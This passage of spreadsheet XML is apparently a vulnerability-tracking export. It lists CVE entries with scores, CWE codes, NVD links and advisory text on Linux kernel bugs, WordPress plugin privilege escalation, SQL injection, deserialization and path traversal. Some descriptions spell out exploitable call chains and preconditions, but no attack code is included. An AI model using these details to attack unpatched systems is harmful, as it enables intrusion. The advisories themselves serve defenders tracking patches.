  ret_from_fork_asm+0x1a/0x30
  &lt;/TASK&gt;
  Kernel panic - not syncing: Fatal exception in interrupt
The machinery that leads to this kernel panic has not been changed between
6.18.48 and mainline.
This patch adds an ingress-delivery helper for the PTP packet_finish()
path that calls netif_receive_skb() instead of napi_gro_receive().
netif_receive_skb(), unlike napi_gro_receive(), can be called from outside
of the NAPI instance's poll context, which can occur at the call site for
this path. RX stats accounting and the skb-&gt;dev assignment are still
preserved; the only change is the delivery call itself.
This removes GR
---truncated---</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98050</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98056</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr"/>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: remove stale namespaces by NSID range during scan
nvme_scan_ns_list() drops the stale namespaces in each gap in the
reported NSID list one NSID at a time. Every iteration calls
nvme_find_get_ns() to look the namespace up and removes it if it is
present. The loop runs once per NSID in the gap rather than once per
namespace actually present.
NSIDs are 32-bit, so a target with a sparse NSID space can make a
single gap spin the loop billions of times with nothing to remove.
  watchdog: BUG: soft lockup - CPU#4 stuck for 26s!
  Workqueue: nvme-wq nvme_scan_work [nvme_core]
  RIP: 0010:__srcu_read_unlock+0xb/0x20
  Call Trace:
   nvme_find_get_ns+0x7d/0xb0 [nvme_core]
   nvme_scan_ns_list+0xe8/0x280 [nvme_core]
   nvme_scan_work+0x18a/0x280 [nvme_core]
   process_one_work+0x197/0x380
   worker_thread+0x2fe/0x410
   kthread+0xe0/0x100
Rename nvme_remove_invalid_namespaces() to nvme_remove_nsid_range()
and give it an open (start, end) NSID range. ctrl-&gt;namespaces is
sorted by NSID, so the whole gap is dropped in a single walk that
stops once end is reached. This bounds the work by the namespaces
that are present instead of by the size of the gap.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98056</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98108</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr"/>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: fix chan mode for LE_CONN_REQ + EXT_FLOWCTL pchan
l2cap_new_connection() sets default value of channel mode to match the
parent channel.  l2cap_le_connect_req() left this at the default, and
created L2CAP_MODE_EXT_FLOWCTL channels if listening pchan has that
mode.  This causes FLAG_DEFER_SETUP channels to reply to
L2CAP_LE_CONN_REQ with L2CAP_ECRED_CONN_RSP, which is incorrect.
It can also result to stack OOB write (of l2cap_alloc_cid determined
values) in l2cap_ecred_rsp_defer(), as l2cap_le_connect_req() does not
limit maximum number of deferred channels or check for duplicate ident.
Fix by setting chan-&gt;mode correctly in l2cap_le_connect_req().
Also check channel mode in l2cap_ecred_rsp_defer(), and do WARN_ON_ONCE
instead of OOB write to make it less brittle.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98108</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100390</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Zoraxy versions 3.2.3 through 3.3.4 fail to properly parse IPv6 addresses in the RemoteAddr field when setting forwarded headers. Unauthenticated attackers connecting over IPv6 can supply arbitrary X-Forwarded-For values to spoof their source IP and bypass authorization provider IP-based access controls.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100390</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98096</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr"/>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: sr: restore network header before routing and forwarding
ipv6_srh_rcv() runs with skb-&gt;data at the Segment Routing Header (SRH)
while skb_network_header() points at the IPv6 header.
When segments_left &gt; 0, ipv6_srh_rcv() previously restored the skb-&gt;data
position by pushing sizeof(struct ipv6hdr), assuming the SRH immediately
followed the fixed IPv6 header. If another extension header (such as a
Hop-by-Hop options header) precedes the SRH, skb_network_offset()
remained negative.
This led to two problems:
1. During ip6_route_input(), fib6_rules_early_flow_dissect() invokes
   __skb_flow_dissect() which passes the negative skb_network_offset()
   to flow dissection, breaking BPF and C flow dissector logic.
2. If forwarded via ip6_forward() or redirected via act_mirred, downstream
   handlers (like sch_fragment() or neighbour output) pass the negative
   offset as an unsigned length, triggering OOB memcpy or buffer overflows.
Fix this by pushing -skb_network_offset(skb) before routing, ensuring
skb_network_offset(skb) is 0 for route lookup / flow dissection as well as
downstream forwarding. On the loopback path, pull skb_transport_offset(skb)
to restore skb-&gt;data to the SRH before looping back.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98096</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100310</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>GNU libextractor before 1.16 loads plugins from an untrusted search path specified by the LIBEXTRACTOR_PREFIX environment variable without proper privilege checks. A local attacker can exploit this by setting LIBEXTRACTOR_PREFIX to a directory containing a malicious plugin that executes arbitrary code with elevated privileges when loaded by a setuid or setgid program.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100310</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100530</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to bind working directory context to reusable exec approvals, allowing approved commands to execute in different directories. Attackers with an allow-always approval can reuse it to run the same command against unreviewed files or repositories with materially different effects.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100530</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93901</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>php, express, gin, hp</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>The Optima Express IDX plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 8.7.5. This is due to the `provisionBlogCredentials()` function in `iHomefinderAdmin.php` being reachable via the `wp_ajax_nopriv_ihf_clear_cache` AJAX action — through the call chain `iHomefinderAjaxHandler::clearCache()` → `activateAuthenticationToken()` → `getAuthenticationInfo()` → `provisionBlogCredentials()` — with no capability check, nonce verification, or ownership validation, and the function unconditionally calling `$user-&gt;set_role('author')` on whichever WordPress account matches the hard-coded login `optima-express` via `get_user_by('login', 'optima-express')`. This makes it possible for unauthenticated attackers to escalate a pre-registered `optima-express` account to the Author role, gaining `publish_posts`, `upload_files`, and `edit_published_posts` capabilities, including access to the plugin's own `/wp-json/optima-express/v1/blog-post` REST endpoint. Exploitation requires open user registration to be enabled on the target site, and the attacker must register the `optima-express` username before the plugin has had the opportunity to provision that login for its own integration account.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93901</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97865</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Open-Web-Analytics up to 1.8.1. Affected is the function Event::loadFromArray of the file queue.php of the component Remote Event Queue Endpoint. Performing a manipulation results in deserialization. The attack can be initiated remotely. Upgrading to version 1.8.2 is able to address this issue. The patch is named 78c1222ec0e2119d84684032da1541120a2cdd23. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97865</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97871</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Zhonglun CloudPos up to 3.0.1.76. This issue affects the function OpenLocalBrowser of the file ZlPos/ZlPos/Bizlogic/JSBridge.cs of the component JSBridge. Such manipulation of the argument url leads to code injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97871</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97882</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. The impacted element is an unknown function of the file loginlinkfaculty.php of the component Faculty Authentication. Executing a manipulation of the argument fid/pass can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97882</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97883</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This affects an unknown function of the file updatequery.php. The manipulation of the argument gid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97883</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97885</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected is an unknown function of the file updatefaculty.php. This manipulation of the argument fid causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97885</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100372</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>ClipBucket v5 before 5.5.3-#197 contains a path traversal vulnerability in the admin template editor that allows authenticated administrators to overwrite PHP files by supplying directory traversal sequences in the folder parameter. Attackers with manage_template_access permission can traverse outside the layout directory to modify executable PHP files and achieve remote code execution as the web server user.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100372</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33639</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
